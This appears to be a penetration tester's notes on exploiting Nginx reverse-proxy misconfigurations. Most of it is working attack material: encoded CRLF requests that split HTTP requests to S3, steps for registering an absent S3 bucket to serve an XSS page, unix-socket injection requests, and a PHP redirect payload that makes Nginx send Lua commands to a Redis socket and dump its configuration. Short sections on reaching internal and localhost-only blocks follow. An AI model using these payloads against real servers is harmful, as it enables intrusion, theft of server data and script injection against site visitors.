middleware Missconfig

# PT Reverse Proxy


## Exploiting HTTP Splitting with cloud storage



location ~ /docs/([^/]*/[^/]*)? {
    proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
}


yourdomain.com/docs/help/contact-us --> https://bucket.s3.amazonaws.com/docs-website/help/contact-us.html;


### Detect vulnerability

[^/]* could include encoded newlines when regex passed to proxy_pass the regex will be decoded.


GET /docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a HTTP/1.1
Host: yourdomain.com


after decoded newlines by proxy_pass

GET /docs-website/ HTTP/1.1
Host:non-existing-bucket1

.html HTTP/1.0
Host: bucket.s3.amazonaws.com


location ~ /images([0-9]+)/([^\s]+) {
    proxy_pass https://s3.amazonaws.com/companyname-images$1/$2;
}


/images1/pwn --> https://s3.amazonaws.com/companyname-images1/pwn
/images2/pwn --> https://s3.amazonaws.com/companyname-images2/pwn

serve our xss payload
steps
1- generate error by proivde number that does't exist
/images1337/ --> generate error which expose s3 serve directory
2- create s3 with same name and serve page with xss payload
/images1337/xss.html -->  https://s3.amazonaws.com/companyname-images1337/xss.html



## Controlling proxied host


location ~ /static/(.*)/(.*) {
proxy_pass   http://$1-example.s3.amazonaws.com/$2;
}


yourdomain.com/static/js/ 

yourdomain.com/static/js/app-1555347823-min.js --> http://js-example.s3.amazonaws.com/app-1555347823-min.js

this could lead to xss by serve xss page under bucket which under attacker control

yourdomain.com/static/xss/xss.html -> http://xss-example.s3.amazonaws.com/xss.html


    proxy_pass http://unix:/var/run/backend.sock:/uri



[+] bypass redis mitigations

connection will be drop if one of the following command it send
[*] The line starts with POST
[*] The line starts with Host


location ~ /static/(.*)/(.*.js) {
    proxy_pass   http://$1-example.s3.amazonaws.com/$2;
}


GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1


GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1



## Following redirects


location ~ /images(.*) {
    proxy_intercept_errors on;
    proxy_pass   http://example.com$1;
    error_page 301 302 307 303 = @handle_redirects;
}


location @handle_redirects {
    set $original_uri $uri;
    set $orig_loc $upstream_http_location;
    proxy_pass $orig_loc;
}



serve site under attacker controll


error_page 404 405 =301 @405;
location @405 {
  try_files /index.php?$args /index.php?$args;
}


<?
header('Location: http://unix:/tmp/redis.sock:\'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")\' 1 ', true, 301);


## Accessing internal Nginx blocks



[*] By using the X-Accel-Redirect response header, we can make Nginx redirect internally to serve another config block, even ones marked with the internal directive:




location /internal_only/ {
    internal;
    root /var/www/html/internal/;
}



### Accessing localhost restricted Nginx blocks


[*] By using a hostname with a DNS A pointer to 127.0.0.1, we can make Nginx redirect internally to blocks allowing localhost only:



location /localhost_only/ {
    deny all;
    allow 127.0.0.1;
    root /var/www/html/internal/;
}